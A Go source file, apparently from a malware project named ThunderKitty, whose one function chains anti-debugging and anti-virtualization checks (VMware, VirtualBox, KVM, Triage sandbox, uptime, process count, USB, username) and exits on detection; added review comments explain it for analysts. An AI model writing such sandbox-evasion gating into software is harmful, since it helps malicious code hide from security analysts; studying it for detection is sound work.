package AntiDebugVMAnalysis
import (
"log"
"os"
// AntiDebug
"github.com/EvilBytecode/GoDefender/AntiDebug/CheckBlacklistedWindowsNames"
"github.com/EvilBytecode/GoDefender/AntiDebug/InternetCheck"
"github.com/EvilBytecode/GoDefender/AntiDebug/IsDebuggerPresent"
"github.com/EvilBytecode/GoDefender/AntiDebug/ParentAntiDebug"
"github.com/EvilBytecode/GoDefender/AntiDebug/RemoteDebugger"
"github.com/EvilBytecode/GoDefender/AntiDebug/RunningProcesses"
"github.com/EvilBytecode/GoDefender/AntiDebug/UserAntiAntiDebug"
"github.com/EvilBytecode/GoDefender/AntiDebug/pcuptime"
// AntiVirtualization
"github.com/EvilBytecode/GoDefender/AntiVirtualization/KVMCheck"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/MonitorMetrics"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/TriageDetection"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/USBCheck"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/UsernameCheck"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/VMWareDetection"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/VirtualboxDetection"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/VMArtifacts"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/RepetitiveProcess"
"github.com/EvilBytecode/GoDefender/AntiVirtualization/ParallelsCheck"
)
// ThunderKitty runs this package's anti-virtualization and anti-debug checks
// in a fixed order and terminates the process with os.Exit(-1) as soon as one
// of them reports an analysis environment. It takes no arguments and returns
// nothing; when no check fires it returns normally to the caller.
//
// NOTE(review): for analysts this is an environment-gating routine. A sample
// that exits immediately with this status during detonation, or a binary that
// carries the "[DEBUG] ..." strings below, is consistent with this function
// having fired. The messages go through the standard log package, so they are
// written at runtime (stderr by default) unless the caller redirects log output.
//
// Most checks discard their error result with `_`, so only the boolean decides
// the outcome. NOTE(review): if a helper returns false together with an error,
// a check that could not run is treated as "nothing detected" - confirm against
// each helper.
func ThunderKitty() {
// lets just catch bunch of vms at beginning lol
// USB check: the only check whose error is inspected. An error or a false
// result both exit without logging; only a true result logs and continues.
if usbPluggedIn, err := USBCheck.PluggedIn(); err != nil {
os.Exit(-1)
} else if usbPluggedIn {
log.Println("[DEBUG] USB devices have been plugged in, check passed.")
} else {
os.Exit(-1)
}
// Username check: the helper returns a single bool; true logs and exits.
if blacklistedUsernameDetected := UsernameCheck.CheckForBlacklistedNames(); blacklistedUsernameDetected {
log.Println("[DEBUG] Blacklisted username detected")
os.Exit(-1)
}
// lets make their job harder.
// Called for its side effects only; nothing it returns is used here.
// NOTE(review): HooksDetection is not the last element of any import path in
// this file; presumably it is the package name declared by the
// UserAntiAntiDebug import - confirm.
HooksDetection.AntiAntiDebug()
//
// AntiVirtualization checks
// Each block below follows the same shape: call the helper, drop its error
// (where it has one), and log + exit when the boolean is true.
if vmwareDetected, _ := VMWareDetection.GraphicsCardCheck(); vmwareDetected {
log.Println("[DEBUG] VMWare detected")
os.Exit(-1)
}
if virtualboxDetected, _ := VirtualboxDetection.GraphicsCardCheck(); virtualboxDetected {
log.Println("[DEBUG] Virtualbox detected")
os.Exit(-1)
}
if kvmDetected, _ := KVMCheck.CheckForKVM(); kvmDetected {
log.Println("[DEBUG] KVM detected")
os.Exit(-1)
}
if triageDetected, _ := TriageDetection.TriageCheck(); triageDetected {
log.Println("[DEBUG] Triage detected")
os.Exit(-1)
}
if isScreenSmall, _ := MonitorMetrics.IsScreenSmall(); isScreenSmall {
log.Println("[DEBUG] Screen size is small")
os.Exit(-1)
}
// The local VMArtifacts shadows the package name inside this if statement;
// the call on the right-hand side still resolves to the package.
if VMArtifacts := VMArtifacts.VMArtifactsDetect(); VMArtifacts {
log.Println("[DEBUG] VMArtifacts components detected. Exiting.")
os.Exit(-1)
}
if repetitiveproc, _ := RepetitiveProcess.Check(); repetitiveproc {
log.Println("[DEBUG] RepetitiveProcess detected. Exiting")
os.Exit(-1)
}
if pararelcheck, _ := ParallelsCheck.CheckForParallels(); pararelcheck {
log.Println("[DEBUG] Parallels detected. Exiting")
os.Exit(-1)
}
// Called for its side effects only; no result is inspected here, so whatever
// it does on a match is decided inside the helper and is not visible from
// this function.
CheckBlacklistedWindowsNames.CheckBlacklistedWindows()
// Other AntiDebug checks
if isDebuggerPresentResult := IsDebuggerPresent.IsDebuggerPresent1(); isDebuggerPresentResult {
log.Println("[DEBUG] Debugger presence detected")
os.Exit(-1)
}
if remoteDebuggerDetected, _ := RemoteDebugger.RemoteDebugger(); remoteDebuggerDetected {
log.Println("[DEBUG] Remote debugger detected")
os.Exit(-1)
}
// Inverted condition: this one exits when the result is false. Because the
// error is discarded, a failed probe that leaves connected == false also
// exits, so a network-isolated host never gets past this point.
if connected, _ := InternetCheck.CheckConnection(); !connected {
log.Println("[DEBUG] Internet connection check failed")
os.Exit(-1)
}
if parentAntiDebugResult := ParentAntiDebug.ParentAntiDebug(); parentAntiDebugResult {
log.Println("[DEBUG] ParentAntiDebug check failed")
os.Exit(-1)
}
// NOTE(review): 50 is presumably a process-count threshold; which side of
// it counts as "detected" is decided in the helper - confirm.
if runningProcessesCountDetected, _ := RunningProcesses.CheckRunningProcessesCount(50); runningProcessesCountDetected {
log.Println("[DEBUG] Running processes count detected")
os.Exit(-1)
}
// NOTE(review): 1200 is presumably an uptime threshold in seconds
// (20 minutes); unit and comparison direction are not visible here - confirm.
if pcUptimeDetected, _ := pcuptime.CheckUptime(1200); pcUptimeDetected {
log.Println("[DEBUG] PC uptime detected")
os.Exit(-1)
}
}